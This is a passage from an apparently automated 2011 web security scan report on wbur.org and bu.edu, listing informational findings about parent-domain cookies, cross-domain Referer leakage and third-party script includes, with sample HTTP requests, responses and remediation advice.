<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.44. https://www.bu.edu/tech/services/departments/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/departments/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/departments/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:21 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:20 GMT
Accept-Ranges: bytes
Content-Length: 108281
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:21 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPQrxHDYAAGJWsQ4AAAFU
X-BU-Duration: D=10019
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.45. https://www.bu.edu/tech/services/faculty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/faculty/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/faculty/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:52 GMT
Accept-Ranges: bytes
Content-Length: 105352
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGJWsOoAAAFG
X-BU-Duration: D=8712
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.46. https://www.bu.edu/tech/services/researchers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/researchers/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/researchers/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:18 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:17 GMT
Accept-Ranges: bytes
Content-Length: 98337
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:18 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOgrxHDYAAGJWsPgAAAFY
X-BU-Duration: D=9158
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.47. https://www.bu.edu/tech/services/staff/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/staff/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/staff/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:19 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:18 GMT
Accept-Ranges: bytes
Content-Length: 104691
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:19 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOwrxHDYAAGJVrSYAAAHG
X-BU-Duration: D=23961
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6.48. https://www.bu.edu/tech/services/students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/students/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/students/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:45 GMT
Accept-Ranges: bytes
Content-Length: 92477
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGUNvMsAAAMY
X-BU-Duration: D=10392
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www.wbur.org/email-this  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:46 GMT
Connection: close
Content-Length: 8134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LdKKMISAAAAAPBfpsoUgxsoleTYi2VRHY4m5exT"></script>

   <noscript>
       <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LdKKMISAAAAAPBfpsoUgxsoleTYi2VRHY4m5exT" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...

7.2. http://www.wbur.org/embed.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /embed.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed.js?pname=wordpress&pver=2.66 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 05 Oct 2011 18:35:48 GMT
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:48 GMT
Connection: close
Content-Length: 35362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<li class="pslitem"><a class="psllink" href="http://www.cartalk.com">Car Talk</a>
...[SNIP]...
<li><a href="http://www.cartalk.com" title="Car Talk">Car Talk</a>
...[SNIP]...
<li><a href="http://www.twitter.com/wbur" title="@wbur on Twitter">@wbur on Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/wburnews" title="WBUR on Facebook">WBUR on Facebook</a>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...
<div style="width:284px;">Follow <a href="http://www.twitter.com/WBUR" class="twitter-anywhere-user">@WBUR</a> on <a href="http://www.twitter.com/WBUR" class="twitter">Twitter</a>
...[SNIP]...
<div style="float:left; margin:0 15px 0 0; width:150px;">Become a fan on <a href="https://www.facebook.com/wburnews">Facebook</a>
...[SNIP]...
<li><a href="http://www.cartalk.com" title="Car Talk">Car Talk</a>
...[SNIP]...
<li><a href="http://www.twitter.com/WBUR" title="@WBUR on Twitter">@WBUR on Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/wburnews" title="WBUR on Facebook">WBUR on Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/wbur" title="WBUR on YouTube">WBUR on YouTube</a>
...[SNIP]...
<li><a href="http://www.bu.edu" rel="external" title="www.bu.edu" class="logo bu"></a>
...[SNIP]...
<li><a href="http://wbur.npr.org" rel="external" title="NPR.org" class="logo npr"></a>
...[SNIP]...
<li><a href="http://www.publicradio.org" rel="external" title="www.publicradio.org" class="logo apm"></a>
...[SNIP]...
<li><a href="http://www.bbc.co.uk" rel="external" title="www.bbc.co.uk" class="logo bbc"></a>
<a href="http://www.pri.org" rel="external" title="www.pri.org" class="logo pri"></a>
...[SNIP]...
<div class="fsiteml">This site is best viewed with: <a href="http://www.mozilla.com/en-US/" rel="external" title="Firefox">Firefox</a> | <a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home" rel="external" title="Internet Explorer 9">Internet Explorer 9</a> | <a href="http://www.google.com/chrome" rel="external" title="Google Chrome">Chrome</a> | <a href="http://www.apple.com/safari/download/" rel="external" title="Apple Safari">Safari</a>
...[SNIP]...

7.3. http://www.wbur.org/media-player  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /media-player

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /media-player?title=live HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:27 GMT
Connection: close
Content-Length: 13381


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head
...[SNIP]...
</script>

   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

7.4. http://www.wbur.org/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q= HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:44 GMT
Connection: close
Content-Length: 34062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<li class="pslitem"><a class="psllink" href="http://www.cartalk.com">Car Talk</a>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" />
<style type="text/css">
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...
<div style="width:284px;">Follow <a href="http://www.twitter.com/WBUR" class="twitter-anywhere-user">@WBUR</a> on <a href="http://www.twitter.com/WBUR" class="twitter">Twitter</a>
...[SNIP]...
<div style="float:left; margin:0 15px 0 0; width:150px;">Become a fan on <a href="https://www.facebook.com/wburnews">Facebook</a>
...[SNIP]...
<li><a href="http://www.cartalk.com" title="Car Talk">Car Talk</a>
...[SNIP]...
<li><a href="http://www.twitter.com/WBUR" title="@WBUR on Twitter">@WBUR on Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/wburnews" title="WBUR on Facebook">WBUR on Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/wbur" title="WBUR on YouTube">WBUR on YouTube</a>
...[SNIP]...
<li><a href="http://www.bu.edu" rel="external" title="www.bu.edu" class="logo bu"></a>
...[SNIP]...
<li><a href="http://wbur.npr.org" rel="external" title="NPR.org" class="logo npr"></a>
...[SNIP]...
<li><a href="http://www.publicradio.org" rel="external" title="www.publicradio.org" class="logo apm"></a>
...[SNIP]...
<li><a href="http://www.bbc.co.uk" rel="external" title="www.bbc.co.uk" class="logo bbc"></a>
<a href="http://www.pri.org" rel="external" title="www.pri.org" class="logo pri"></a>
...[SNIP]...
<div class="fsiteml">This site is best viewed with: <a href="http://www.mozilla.com/en-US/" rel="external" title="Firefox">Firefox</a> | <a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home" rel="external" title="Internet Explorer 9">Internet Explorer 9</a> | <a href="http://www.google.com/chrome" rel="external" title="Google Chrome">Chrome</a> | <a href="http://www.apple.com/safari/download/" rel="external" title="Apple Safari">Safari</a>
...[SNIP]...

8. Cross-domain script include  previous  next
There are 84 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


8.1. http://www.wbur.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.wbur.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 17:59:50 GMT
Content-Length: 62508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.2. http://www.wbur.org/2011/10/03/brown-on-poll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/03/brown-on-poll

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/03/brown-on-poll HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36878>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:26 GMT
Connection: close
Content-Length: 48965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/03/brown-on-poll" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.3. http://www.wbur.org/2011/10/03/massachusetts-senate-democrats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/03/massachusetts-senate-democrats

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/03/massachusetts-senate-democrats HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36695>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:26 GMT
Connection: close
Content-Length: 68021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/03/massachusetts-senate-democrats" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.4. http://www.wbur.org/2011/10/04/caroline-kennedy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/04/caroline-kennedy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/04/caroline-kennedy HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36907>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:27 GMT
Connection: close
Content-Length: 57083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/04/caroline-kennedy" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.5. http://www.wbur.org/2011/10/04/mass-gambling-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/04/mass-gambling-5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/04/mass-gambling-5 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36905>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:30 GMT
Connection: close
Content-Length: 50811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/04/mass-gambling-5" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.6. http://www.wbur.org/2011/10/04/massachusetts-tax-receipts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/04/massachusetts-tax-receipts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/04/massachusetts-tax-receipts HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36926>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:29 GMT
Connection: close
Content-Length: 48389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/04/massachusetts-tax-receipts" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.7. http://www.wbur.org/2011/10/04/senate-debate-10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/04/senate-debate-10

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/04/senate-debate-10 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Link: <http://www.wbur.org/?p=36881>; rel=shortlink
Date: Wed, 05 Oct 2011 18:35:28 GMT
Connection: close
Content-Length: 60595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/2011/10/04/senate-debate-10" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.8. http://www.wbur.org/2011/10/05/adl-anti-semitism-on-the-rise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /2011/10/05/adl-anti-semitism-on-the-rise

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/10/05/adl-anti-semitism-on-the-rise HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

